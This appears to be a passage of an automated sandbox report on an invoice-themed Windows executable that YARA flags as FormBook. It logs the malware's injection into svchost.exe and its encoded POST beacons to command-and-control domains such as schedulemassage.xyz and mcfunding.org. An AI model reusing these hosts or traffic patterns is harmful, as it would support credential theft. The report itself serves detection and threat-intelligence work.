                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.6499453.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:49.467888117 CET828OUTPOST /slxp/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.schedulemassage.xyz
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 208
                                                            Cache-Control: no-cache
                                                            Origin: http://www.schedulemassage.xyz
                                                            Referer: http://www.schedulemassage.xyz/slxp/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 67 49 50 2b 59 57 57 6b 71 55 59 61 48 4f 42 5a 33 2b 32 69 6d 51 56 2f 41 4c 35 6d 68 39 36 6f 6e 69 69 34 71 78 52 54 42 36 6f 41 50 56 4b 4b 54 6d 46 69 61 2b 59 4d 53 6c 75 52 35 43 45 63 4e 4e 6d 52 75 4a 5a 46 33 74 6f 4b 6e 61 69 49 77 58 36 71 7a 72 65 59 44 6e 73 4e 72 6d 49 45 62 6d 2b 51 4d 57 65 36 53 5a 6e 5a 6c 35 42 41 62 61 42 71 4a 54 7a 64 31 6e 68 51 6a 65 5a 4f 69 79 55 59 32 61 76 35 4d 2f 38 47 59 79 33 66 6a 35 76 70 57 6e 36 33 4a 54 58 57 63 65 31 66 32 42 5a 37 41 2b 70 71 7a 65 31 78 44 72 35 39 4e 41 55 59 34 5a 32 78 4a 6f 4f 31 38 4d 50 5a
                                                            Data Ascii: yX7=dp+M27OzYBUBgIP+YWWkqUYaHOBZ3+2imQV/AL5mh96onii4qxRTB6oAPVKKTmFia+YMSluR5CEcNNmRuJZF3toKnaiIwX6qzreYDnsNrmIEbm+QMWe6SZnZl5BAbaBqJTzd1nhQjeZOiyUY2av5M/8GYy3fj5vpWn63JTXWce1f2BZ7A+pqze1xDr59NAUY4Z2xJoO18MPZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.6499523.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:52.125418901 CET852OUTPOST /slxp/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.schedulemassage.xyz
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 232
                                                            Cache-Control: no-cache
                                                            Origin: http://www.schedulemassage.xyz
                                                            Referer: http://www.schedulemassage.xyz/slxp/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 65 6f 6e 47 75 34 34 45 74 54 41 36 6f 41 58 46 4c 41 58 6d 46 31 61 2b 55 69 53 68 6d 52 35 43 41 63 4e 4a 69 52 75 36 78 47 74 64 6f 49 75 36 69 4f 39 33 36 71 7a 72 65 59 44 6a 45 72 72 6d 51 45 62 32 75 51 4e 30 6d 35 4e 70 6e 65 69 35 42 41 52 36 42 75 4a 54 7a 6a 31 69 34 59 6a 63 68 4f 69 33 77 59 32 4c 76 2b 44 2f 39 4e 63 79 32 30 6b 34 53 51 53 55 6a 4e 48 42 2f 4f 42 59 5a 4f 7a 33 45 68 63 4e 70 4a 68 4f 56 7a 44 70 68 50 4e 67 55 79 36 5a 4f 78 62 2f 43 53 7a 34 71 36 70 35 41 49 64 44 70 2b 72 62 6f 4a 4d 48 30 6b 65 30 68 71 74 67 3d 3d
                                                            Data Ascii: yX7=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhveonGu44EtTA6oAXFLAXmF1a+UiShmR5CAcNJiRu6xGtdoIu6iO936qzreYDjErrmQEb2uQN0m5Npnei5BAR6BuJTzj1i4YjchOi3wY2Lv+D/9Ncy20k4SQSUjNHB/OBYZOz3EhcNpJhOVzDphPNgUy6ZOxb/CSz4q6p5AIdDp+rboJMH0ke0hqtg==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.6499583.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:54.780652046 CET1865OUTPOST /slxp/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.schedulemassage.xyz
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1244
                                                            Cache-Control: no-cache
                                                            Origin: http://www.schedulemassage.xyz
                                                            Referer: http://www.schedulemassage.xyz/slxp/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 57 6f 6e 7a 79 34 70 58 46 54 44 36 6f 41 4a 56 4c 44 58 6d 45 33 61 2b 4d 75 53 68 69 72 35 45 63 63 4d 71 71 52 6f 4c 78 47 6a 74 6f 49 73 36 69 50 77 58 36 46 7a 72 4f 55 44 6e 67 72 72 6d 51 45 62 77 53 51 62 57 65 35 65 35 6e 5a 6c 35 42 63 62 61 42 47 4a 54 37 73 31 6a 4d 49 69 73 42 4f 6a 58 41 59 77 35 58 2b 63 50 39 50 62 79 32 73 6b 34 65 78 53 58 48 37 48 46 2f 77 42 65 6c 4f 78 52 35 4b 44 2b 6c 77 2f 4d 46 75 65 65 6b 6b 4b 6c 38 61 69 50 61 4d 66 73 4b 6b 78 5a 57 78 75 73 70 56 57 31 30 62 6a 38 30 69 53 68 56 44 53 6b 77 61 37 54 6b 34 4f 66 57 31 73 46 4d 50 69 34 50 6f 72 66 37 4d 41 4e 36 62 67 44 4b 37 6b 52 56 59 70 37 67 48 6b 33 6f 36 42 53 62 46 37 5a 4a 41 6f 7a 30 36 45 41 6d 38 58 4a 7a 32 35 77 76 59 78 4d 75 45 2f 41 67 6d 64 49 57 6b 46 39 66 44 37 39 78 66 36 34 57 4f 61 50 63 36 35 68 65 39 69 47 38 4e 74 36 6f 7a 58 30 75 41 43 63 [TRUNCATED]
                                                            Data Ascii: yX7=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhvWonzy4pXFTD6oAJVLDXmE3a+MuShir5EccMqqRoLxGjtoIs6iPwX6FzrOUDngrrmQEbwSQbWe5e5nZl5BcbaBGJT7s1jMIisBOjXAYw5X+cP9Pby2sk4exSXH7HF/wBelOxR5KD+lw/MFueekkKl8aiPaMfsKkxZWxuspVW10bj80iShVDSkwa7Tk4OfW1sFMPi4Porf7MAN6bgDK7kRVYp7gHk3o6BSbF7ZJAoz06EAm8XJz25wvYxMuE/AgmdIWkF9fD79xf64WOaPc65he9iG8Nt6ozX0uACczOp01fFQY6rRVSB/Zyf8CqsDbpl+MXwtW6O7qRa2ZiznSXugUw0cdMW09V2w699TDEP0lF6mRbfwOprrmV3PV+/4I/k5K1LpI8ZBMmco4G405pgpeAHCXhkVbDsYauMmiTefod+5OAPbFIpbejBqKVX2ESzlLu7I+99oLknD7e6CTHYD6A2HrYaUdSqEahYvNbMtFJW0XRWjw4uWUb8J2I7Snv3m9Fr5i0bwUPmA1rg3IBMrbiTxRHJwl8xZcD2eSjm63c3kTKBdKIS2FedZPrBWv7KXu2i/nT1xL46GkwwpCIS7khin/ZSpM/MvOjP0VB+SMTO2aC7Z7Oh1O4CYnCCKIDzBNeYpwmbVOzmw0OQY4+2CgWBDvQ89HTHzqhpQmcBYzeZG7eQwEsGFWudQFWXJI4eMsfIjM0+d1mYaNZu0i3d8DBZ+XRR7he81yrJ+6Sr0n0RsOVnekvO83NKxUo9p66C0jif4Mu41r6MWdy7hCkG84XmgxzIsZiZEWsSwAxbulo3WbcjKSvIMzIqHPYt+GvV9WI/fSeB7umxlIEIx39flyFEpGcGzyZXykMBP/HKeD9rTF7+axKu5/uAucqCmuCcwze5+l5A/4l5xfrTIuEmfshXMpLxpWaaF58ramB2TqhHSpe1nf6U8IJZZYfXZh1Stc3tZct [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.6499643.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:57.439598083 CET550OUTGET /slxp/?yX7=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&Hx=ot9h HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.schedulemassage.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Nov 25, 2024 13:45:58.578916073 CET403INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Mon, 25 Nov 2024 12:45:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 263
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 58 37 3d 51 72 57 73 31 4d 47 62 59 79 51 46 6f 71 33 70 41 69 61 73 78 51 30 76 4a 59 45 30 7a 2f 76 61 77 54 5a 65 65 49 31 69 38 74 6d 38 6b 78 65 4e 34 6d 52 61 49 5a 51 71 44 6d 53 72 65 31 41 7a 4e 39 73 49 65 47 2b 50 78 51 34 31 45 4c 2b 58 71 6f 6c 4f 69 66 63 41 6f 36 2f 30 34 33 4f 73 31 62 69 6e 43 54 73 51 74 67 51 69 45 32 58 66 48 48 69 6b 64 66 7a 66 6a 4b 46 5a 52 2b 4e 71 4c 7a 50 55 2f 58 77 3d 26 48 78 3d 6f 74 39 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yX7=QrWs1MGbYyQFoq3pAiasxQ0vJYE0z/vawTZeeI1i8tm8kxeN4mRaIZQqDmSre1AzN9sIeG+PxQ41EL+XqolOifcAo6/043Os1binCTsQtgQiE2XfHHikdfzfjKFZR+NqLzPU/Xw=&Hx=ot9h"}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.6499803.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:46:04.384766102 CET810OUTPOST /0598/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.mcfunding.org
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 208
                                                            Cache-Control: no-cache
                                                            Origin: http://www.mcfunding.org
                                                            Referer: http://www.mcfunding.org/0598/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 4a 61 35 5a 30 6f 6d 6e 72 43 53 4a 78 65 5a 58 72 43 49 4e 65 6b 76 44 6a 6b 56 6e 35 4c 58 73 4b 58 4f 61 49 54 63 58 44 71 76 66 6a 4a 71 42 71 6e 7a 37 59 4a 4d 65 69 32 41 30 72 53 6f 72 65 46 2f 75 48 62 49 66 64 66 76 69 42 33 4f 54 50 64 64 71 78 31 2f 4a 6b 32 76 5a 46 64 6a 33 6a 67 76 37 45 74 33 52 6d 30 77 71 48 79 77 56 57 6b 70 6a 64 6c 48 42 57 51 72 41 52 51 52 69 77 2f 38 33 4b 6e 78 37 42 32 6e 48 72 34 62 38 31 30 67 76 37 77 6d 6e 57 36 4e 38 5a 4d 63 53 79 53 77 49 2f 56 34 79 69 6a 2f 43 64 63 36 2f 73 46 4e 61 57 32 75 5a 2b 76 59 4a 61 2b 4c
                                                            Data Ascii: yX7=g4UhOENgM8To+Ja5Z0omnrCSJxeZXrCINekvDjkVn5LXsKXOaITcXDqvfjJqBqnz7YJMei2A0rSoreF/uHbIfdfviB3OTPddqx1/Jk2vZFdj3jgv7Et3Rm0wqHywVWkpjdlHBWQrARQRiw/83Knx7B2nHr4b810gv7wmnW6N8ZMcSySwI/V4yij/Cdc6/sFNaW2uZ+vYJa+L


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.6499863.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:46:07.180429935 CET834OUTPOST /0598/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.mcfunding.org
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 232
                                                            Cache-Control: no-cache
                                                            Origin: http://www.mcfunding.org
                                                            Referer: http://www.mcfunding.org/0598/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 2f 58 69 49 2f 4f 62 4b 37 63 51 44 71 76 51 44 4a 7a 46 71 6d 65 37 5a 30 6d 65 6a 61 41 30 72 47 6f 72 63 74 2f 70 30 44 4c 5a 4e 66 74 76 68 33 49 51 2f 64 64 71 78 31 2f 4a 67 66 79 5a 46 56 6a 33 54 51 76 35 6c 74 30 63 47 30 33 70 48 79 77 43 47 6b 74 6a 64 6c 78 42 54 78 41 41 54 6f 52 69 78 76 38 33 62 6e 32 77 42 32 68 44 72 34 4c 78 58 6b 77 76 59 49 69 67 41 36 68 6e 49 41 55 58 45 50 71 55 4d 56 62 67 79 44 39 43 66 45 49 2f 4d 46 6e 59 57 4f 75 4c 70 6a 2f 47 75 62 6f 52 67 68 33 47 77 68 47 71 32 39 70 41 4e 47 54 61 51 57 48 6a 51 3d 3d
                                                            Data Ascii: yX7=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkK/XiI/ObK7cQDqvQDJzFqme7Z0mejaA0rGorct/p0DLZNftvh3IQ/ddqx1/JgfyZFVj3TQv5lt0cG03pHywCGktjdlxBTxAAToRixv83bn2wB2hDr4LxXkwvYIigA6hnIAUXEPqUMVbgyD9CfEI/MFnYWOuLpj/GuboRgh3GwhGq29pANGTaQWHjQ==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.6499943.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:46:10.116610050 CET1847OUTPOST /0598/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.mcfunding.org
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1244
                                                            Cache-Control: no-cache
                                                            Origin: http://www.mcfunding.org
                                                            Referer: http://www.mcfunding.org/0598/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 67 34 55 68 4f 45 4e 67 4d 38 54 6f 2b 70 71 35 62 56 6f 6d 68 4c 43 56 55 42 65 5a 64 4c 43 45 4e 65 67 76 44 69 78 4b 6b 4b 6e 58 69 35 66 4f 61 72 37 63 52 44 71 76 5a 6a 4a 32 46 71 6d 6d 37 59 63 69 65 6a 47 51 30 70 2b 6f 71 2f 56 2f 6f 46 44 4c 58 4e 66 74 7a 52 33 4a 54 50 64 4d 71 78 6c 7a 4a 6b 44 79 5a 46 56 6a 33 56 55 76 33 6b 74 30 65 47 30 77 71 48 79 73 56 57 6c 34 6a 64 64 68 42 54 38 37 41 69 49 52 69 51 66 38 34 4a 50 32 79 68 32 6a 4f 4c 35 55 78 58 70 33 76 59 46 5a 67 41 6d 4c 6e 4b 63 55 58 43 2b 4a 4b 5a 31 30 6a 79 62 53 42 63 4d 43 2f 35 41 55 53 56 69 77 4c 61 53 58 49 76 6e 44 56 77 70 2b 49 68 45 69 6a 56 31 57 4f 6f 69 41 52 42 76 65 68 59 75 5a 48 7a 57 49 53 6a 6a 32 76 71 74 44 39 69 78 57 49 55 32 34 69 74 55 42 50 6d 6d 55 31 75 73 4b 71 72 6d 4e 4d 56 52 74 56 34 65 34 74 7a 69 47 71 67 47 6a 71 54 45 71 6d 52 42 37 75 5a 52 64 39 79 66 41 50 41 53 6d 54 64 68 55 31 64 48 42 51 4f 69 39 39 50 47 2f 6d 33 6c 62 67 2b 32 79 56 6a 37 72 46 54 66 55 64 39 [TRUNCATED]
                                                            Data Ascii: yX7=g4UhOENgM8To+pq5bVomhLCVUBeZdLCENegvDixKkKnXi5fOar7cRDqvZjJ2Fqmm7YciejGQ0p+oq/V/oFDLXNftzR3JTPdMqxlzJkDyZFVj3VUv3kt0eG0wqHysVWl4jddhBT87AiIRiQf84JP2yh2jOL5UxXp3vYFZgAmLnKcUXC+JKZ10jybSBcMC/5AUSViwLaSXIvnDVwp+IhEijV1WOoiARBvehYuZHzWISjj2vqtD9ixWIU24itUBPmmU1usKqrmNMVRtV4e4tziGqgGjqTEqmRB7uZRd9yfAPASmTdhU1dHBQOi99PG/m3lbg+2yVj7rFTfUd9UtoFEcgBdksW/G/frLwS9kndSRG4tuy7lIRtSvNjH5lNVvhVtdhnqH1A41f2Mulzfbuix7NBgRXkToV+vK3mw8R7fIGWoP5OOGYxn7FsN6fbYqafHq/3i38fgkjKyba6lCIS+yIyY1I75Q+FNJtRKm9ilKarEtEc4i9PgcRuYOn7JD+cfqcD3HVSp6k4k5wJw/bGZH3KpL9B8BI3VJxK4DNq1N9PvaMIned4I0tLh1ivgv4Oi0jOfHKjp4Joqe/Dck0PVnANi3Dk6XJESjAzPA2VIvMQNY7nxjDFElwnZmS9dGXSSdboswlFPyiAiWpQs/6tEAZJzdi4WrsjGpJp3zjSpKbJ5vdrbWbIdLCxWgh9GiQRrere0fX6yT41LVHs8LDny7FBj6mDdiCWjOvtDR6/UeVc7IJdP9DuhOWBZFgQbLkPGLHEhH5hEd35kCh08WA9DBPJjbHAj1eH8mroU0rlz8pEXRUgTE5c+d8j1zlFYVxx5YpK/qoAUTdHoiO3gej2XfJcIny6mWWvxqXoKOVIg7rRNEvMzDL3PbUOBsKX6NeQEWs+sNQ+JmFzfQ/tmDCbTZqY6FrD5Vv/PCPo5KWCIQj67DKkd7sJzod0gbfG3c8E8PzYm5caRd175W0iYU2rJX8cHGHhj6SKZFbgLVrsOwL/dblXVi [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.6500043.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:46:12.879642010 CET544OUTGET /0598/?yX7=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=&Hx=ot9h HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.mcfunding.org
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Nov 25, 2024 13:46:13.971539974 CET403INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Mon, 25 Nov 2024 12:46:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 263
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 58 37 3d 74 36 38 42 4e 30 39 69 56 65 71 62 2f 49 75 4c 46 31 6f 61 37 4c 47 44 4f 30 37 2f 57 37 43 46 49 6f 6f 63 48 51 73 33 6c 6f 7a 71 67 36 50 69 45 34 69 72 5a 42 2b 64 56 6b 52 63 4e 4b 6e 33 71 71 59 54 66 7a 2b 55 32 4b 4b 73 6b 64 52 73 76 47 76 34 54 75 2b 58 69 52 36 4e 58 6f 74 47 72 79 39 41 4e 45 65 65 52 43 6f 4e 34 46 68 62 78 6e 42 5a 53 6e 49 68 6d 30 53 7a 4b 30 4d 69 73 49 5a 6c 44 6a 4d 3d 26 48 78 3d 6f 74 39 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yX7=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=&Hx=ot9h"}</script></head></html>


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:2
                                                            Start time:07:44:11
                                                            Start date:25/11/2024
                                                            Path:C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe"
                                                            Imagebase:0x1f0000
                                                            File size:1'212'928 bytes
                                                            MD5 hash:FAF30D977546A3527433829420A666C5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:07:44:12
                                                            Start date:25/11/2024
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe"
                                                            Imagebase:0xe60000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2493193897.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2493863404.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2492860834.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:07:44:37
                                                            Start date:25/11/2024
